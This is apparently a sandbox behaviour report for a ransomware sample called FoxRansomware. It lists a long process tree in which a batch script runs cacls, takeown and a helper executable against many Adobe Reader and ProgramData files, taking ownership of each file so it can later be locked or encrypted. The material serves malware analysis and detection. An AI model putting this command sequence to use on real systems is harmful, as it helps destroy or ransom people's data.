C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:6940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:6716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵PID:2012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "usa37.hyp" -nobanner3⤵PID:6360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "usa37.hyp" -nobanner4⤵PID:6744
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:6768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:1188
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵PID:1716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:6772
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:6620
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:2044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:2376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵PID:6788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:1420
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:7064
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵PID:112
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:1284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵PID:1820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "email_all.gif" -nobanner3⤵PID:784
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "email_all.gif" -nobanner4⤵PID:1304
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵PID:644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:2632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵PID:604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "open_original_form.gif" -nobanner3⤵PID:2876
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "open_original_form.gif" -nobanner4⤵PID:808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵PID:1976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:1720
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵PID:2728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "rss.gif" -nobanner3⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "rss.gif" -nobanner4⤵PID:652
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:1100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵PID:1116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:2424
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵PID:2944
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:2868
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:1448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵
- Modifies file permissions
PID:5416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:1252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:1480
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2276
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:1952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:2420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵PID:2436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "SY______.PFM" -nobanner3⤵PID:2104
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "SY______.PFM" -nobanner4⤵PID:964
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:2284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:3036
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:1708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:2088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:1964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵PID:2236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "can129.hsp" -nobanner3⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "can129.hsp" -nobanner4⤵PID:1656
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:1452
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:2948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵
- Modifies file permissions
PID:3040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:2700
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:1872
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:2820
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:2252
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵PID:2460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:2788
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:2716
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:812
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:1712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵
- Modifies file permissions
PID:3156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:356
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CP1258.TXT" -nobanner4⤵PID:3356
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3368
-
-
-
[level 2] C:\Windows\SysWOW64\cmd.exe (PID 3400)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 3440)
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 2448)
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    - Suspicious use of AdjustPrivilegeToken
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 3452)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "background.png" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 3488)
      NDS5iFeg.exe -accepteula "background.png" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 3492)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 3528)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 3192)
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 3476)
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 3216)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "tasks.xml" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 3240)
      NDS5iFeg.exe -accepteula "tasks.xml" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 1520)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 3292)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 3220)
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 3328)
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 3468)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "qmgr0.dat" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 3180)
      NDS5iFeg.exe -accepteula "qmgr0.dat" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 3308)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 3296)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 2932)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 5408)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"
    - Modifies file permissions
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 3548)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ended_review_or_form.gif" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 3796)
      NDS5iFeg.exe -accepteula "ended_review_or_form.gif" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 3824)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 3244)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 3864)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 3652)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 3884)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "reviewers.gif" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 2136)
      NDS5iFeg.exe -accepteula "reviewers.gif" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 3836)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 3748)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 3936)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 3812)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 2844)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "server_lg.gif" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 3660)
      NDS5iFeg.exe -accepteula "server_lg.gif" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 3048)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 4148)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 3580)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 3908)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 3892)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 3896)
      NDS5iFeg.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 3592)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 3692)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 3712)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 3772)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"
    - Modifies file permissions
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 3608)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MinionPro-Bold.otf" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 3632)
      NDS5iFeg.exe -accepteula "MinionPro-Bold.otf" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4324)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 4332)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 3784)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 3996)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 3956)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "zy______.pfm" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4000)
      NDS5iFeg.exe -accepteula "zy______.pfm" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4004)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 4292)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 4176)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 4200)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 4216)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "brt.fca" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4236)
      NDS5iFeg.exe -accepteula "brt.fca" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4016)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 4244)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 4264)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 4044)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"
  [level 3] C:\Windows\SysWOW64\cmd.exe (PID 4060)
    C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "eng.hyp" -nobanner
    [level 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4052)
      NDS5iFeg.exe -accepteula "eng.hyp" -nobanner
  [level 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (PID 4312)
    NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner

[level 2] C:\Windows\SysWOW64\cmd.exe (PID 4032)
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""
  [level 3] C:\Windows\SysWOW64\cacls.exe (PID 4472)
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C
  [level 3] C:\Windows\SysWOW64\takeown.exe (PID 3980)
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"
